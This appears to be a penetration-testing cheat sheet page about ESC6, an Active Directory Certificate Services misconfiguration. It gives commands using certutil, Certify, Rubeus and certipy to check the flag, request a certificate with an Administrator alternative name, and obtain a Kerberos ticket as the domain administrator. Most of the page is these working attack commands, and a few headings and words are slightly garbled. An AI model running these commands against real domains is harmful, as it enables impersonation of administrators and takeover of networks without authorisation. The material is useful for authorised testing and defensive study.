Skip to main content

ESC6

Note: ESC6 got patch on May of 2022.

ESC6 permits the inclusion of user-defined values in subject alternative name for any request. VerifyOn Windows we can verify the permission:permission :

PS /home/bobbuilder> certutil -config "CA_HOST\CA_NAME" -getreg "policy\EditFlags"

Windows

Request a certificate abusing ESC6

PS /home/bobbuilder> .\Certify.exe request /ca:<ca_name> /template:<template_name> /altname:Administrator

Convert certificate to PFX

Get a TGT as the Administrator Account

PS /home/bobbuilder> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx

Linux

Certificate Request with an alternative UPN

bob$ certipy req -username user1@minions.com -password password1 -ca <ca_name> -target <ip> -template <template_name> -upn administrator@minions.com